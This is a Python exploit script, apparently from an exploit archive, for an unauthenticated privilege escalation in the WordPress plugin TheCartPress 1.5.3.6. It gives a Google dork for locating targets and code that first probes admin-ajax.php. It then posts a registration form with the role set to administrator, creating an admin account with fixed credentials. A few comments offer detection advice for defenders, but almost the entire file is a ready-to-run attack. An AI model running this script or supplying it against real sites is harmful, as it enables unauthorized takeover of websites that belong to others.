## https://sploitus.com/exploit?id=PACKETSTORM:164403
# Exploit Title: WordPress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)  
# Google Dork: inurl:/wp-content/plugins/thecartpress/  
# Date: 04/10/2021  
# Exploit Author: spacehen  
# Vendor Homepage: https://wordpress.org/plugin/thecartpress  
# Version: <= 1.5.3.6  
# Tested on: Ubuntu 20.04.1  
  
import os.path  
from os import path  
import json  
import requests;  
import sys  
  
def print_banner():
    """Print the tool banner (advisory title and author line) to stdout."""
    banner_lines = (
        "TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation",
        "Author -> space_hen (www.github.com/spacehen)",
    )
    for text in banner_lines:
        print(text)
  
def print_usage():
    """Print the two-line command-line usage text to stdout."""
    print(
        "Usage: python3 exploit.py [target url]",
        "Ex: python3 exploit.py https://example.com",
        sep="\n",
    )
  
def vuln_check(uri):
    """Return True when a GET to *uri* yields a body containing the plugin's
    "User name is required" validation text, else False.

    The marker is the plugin's own error message for a request that
    carries no user-name field, so its presence is taken to mean the
    AJAX action is registered and reachable without authentication.
    Only the response body is inspected; the HTTP status is ignored.
    Network errors are not handled here and propagate from ``requests``.
    """
    marker = "User name is required"
    body = requests.get(uri).text
    return marker in body
  
def main():
    """Entry point: check argv, probe the endpoint, then send the request
    the advisory describes.

    Reads the target base URL from ``sys.argv[1]``. Exits with status 1
    on bad usage or when :func:`vuln_check` does not see the marker.
    Network errors raised by ``requests`` are not caught.

    Reviewer notes, limited to what this script actually sends: the only
    endpoint touched is ``/wp-admin/admin-ajax.php`` with
    ``action=tcp_register_and_login_ajax`` — one unauthenticated GET
    probe, then one POST whose form body includes a client-supplied
    ``tcp_role`` field. That field is the security-relevant point: the
    advisory's claim is that the server honours a role chosen by the
    requester. For defenders, unauthenticated POSTs to admin-ajax.php
    carrying ``tcp_role`` are the thing to log and alert on, and updating
    or disabling the plugin removes the handler.
    """
    print_banner()
    if len(sys.argv) != 2:
        print_usage()
        sys.exit(1)

    target = sys.argv[1]
    endpoint = "/wp-admin/admin-ajax.php"
    action = "tcp_register_and_login_ajax"
    uri = f"{target}{endpoint}?action={action}"

    if not vuln_check(uri):
        print("(*) Target not vulnerable!")
        sys.exit(1)

    # Form body exactly as the original script posts it; the role field is
    # the escalation vector described in the header comment.
    form = {
        "tcp_new_user_name": "admin_02",
        "tcp_new_user_pass": "admin1234",
        "tcp_repeat_user_pass": "admin1234",
        "tcp_new_user_email": "test@test.com",
        "tcp_role": "administrator",
    }
    print("Inserting admin...")
    reply = requests.post(uri, data=form)
    # The script treats a two-character body of "" (presumably a
    # JSON-encoded empty string) as success; anything else is echoed back
    # unmodified so the operator can inspect the server's answer.
    if reply.text == '""':
        print("Success!")
        print("Now login at /wp-admin/")
    else:
        print(reply.text)
  
main()  # module-level call: runs on import as well as when executed directly